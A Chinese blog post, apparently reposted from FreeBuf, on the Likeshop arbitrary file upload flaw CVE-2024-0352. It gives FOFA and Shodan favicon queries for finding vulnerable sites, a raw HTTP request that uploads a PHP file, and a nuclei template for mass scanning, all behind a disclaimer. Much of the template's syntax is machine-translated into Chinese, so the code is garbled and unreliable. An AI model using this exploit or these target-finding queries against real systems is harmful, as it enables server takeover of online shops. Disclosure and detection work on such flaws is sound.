发布于周五 15:494天前 # 免责声明: **文中涉及的漏洞已修复,敏感信息已编码。文章仅供经验分享。别当真。未经授权的攻击是违法的!文章中的敏感信息已经过多个级别的处理。因传播、使用本文提供的信息而造成的任何直接或间接的后果和损失均由用户自行承担。作者对此不承担任何责任。一切后果请自行承担。 ** ## 1:漏洞描述 Likeshop是一个100%开源免费的B2B2C多商户商城系统,支持官方旗舰店、商户入驻、平台佣金+商户独立结算、统一下单+订单拆分等功能。该产品存在任意文件上传,攻击者可以通过该漏洞上传木马获取服务器权限。 ## 2:受漏洞影响的版本 版本=2.5.7.20210311 ## 三:网络空间地图查询 福法 `icon_hash=\'874152924\'` ##四:漏洞复现 POC: ```` POST /api/file/formimage HTTP/2 主机: x.x.x。 User-Agent: Mozilla/5.0(Windows NT 6.3;WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/41.0.2226.0 Safari/537.36 连接:关闭 内容长度: 201 Content-Type: 多部分/表单数据;边界=----WebKitFormBoundarygcflwtei Accept-Encoding: gzip、deflate ------WebKitFormBoundarygcflwtei Content-Disposition: 表单数据; name=\'file\';filename=\'test.php\' 内容类型:应用程序/x-php 该页面存在漏洞! ------WebKitFormBoundarygcflwtei-- `` ## 批量检测 ```` id: CVE-2024-0352 信息: name: Likeshop 2.5.7.20210311 - 任意文件上传 作者: CookieHanHoan,babybash,samuelsamuelsamuel 严重性: 高 描述: | Likeshop 中发现了一个严重漏洞,版本号为2.5.7.20210311。该漏洞影响组件HTTP POST Request Handler的文件server/application/api/controller/File.php的FileServer:userFormImage函数。使用未知输入操作参数文件会导致不受限制的上传漏洞。该漏洞的CWE 定义为CWE-434 影响: | 该产品允许攻击者上传或传输可在产品环境中自动处理的危险类型的文件。众所周知,它会影响机密性、完整性和可用性。 remediation: 更新到最新版本 参考: - https://nvd.nist.gov/vuln/detail/CVE-2024-0352 - https://note.zhaoj.in/share/ciwYj7QXC4sZ - https://vuldb.com/?ctiid.250120 - https://vuldb.com/?id.250120 分类: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 CVE-id: CVE-2024-0352 CWE-id: CWE-434 元数据: 已验证: 正确 最大请求: 1 供应商: 喜欢商店 shodan-query: http.favicon.hash:874152924 标签: cve、cve2024、rce、文件上传、likeshop、侵入性、侵入性 变量: 文件名: \'{{rand_base(6)}}\' http: - 原始: - | POST /api/file/formimage HTTP/1.1 Host: {{主机名}} Content-Type: 多部分/表单数据;边界=----WebKitFormBoundarygcflwtei User-Agent: Mozilla/5.0(Windows NT 6.3;WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/41.0.2226.0 Safari/537.36 ------WebKitFormBoundarygcflwtei Content-Disposition: 表单数据; name=\'文件\';filename=\'{{filename}}.php\' 内容类型:应用程序/x-php {{兰德斯特}} ------WebKitFormBoundarygcflwtei-- 匹配器: - : DSL 型 DSL: - '状态代码==200' - '包含(正文,\'\\\'名称\\':\\\'{{文件名}}.php\\\'\')' - 'contains_all(body, \'代码\\\':1\', \'base_url\\\':\\\'上传\/用户\')' 条件: 和 提取器: - 类型: json Part: 身体 json: - \'.data.url\' #digest: 4a0a00473045022100deb88d0d5f3f0af25df24379957bd65e84c9ce39a4d8c4aa791388f67b61c25002207f6c805 34d7839ef8754e96b5ea1c543908e9c77315afcb83a24e6022d227026:922c64590222798bb761d5b6d8e72950 `` 转载自freebuf:[https://www.freebuf.com/articles/web/389841.html](https://www.freebuf.com/articles/web/389841.html) 作者:奶酪土拨鼠
创建帐户或登录后发表意见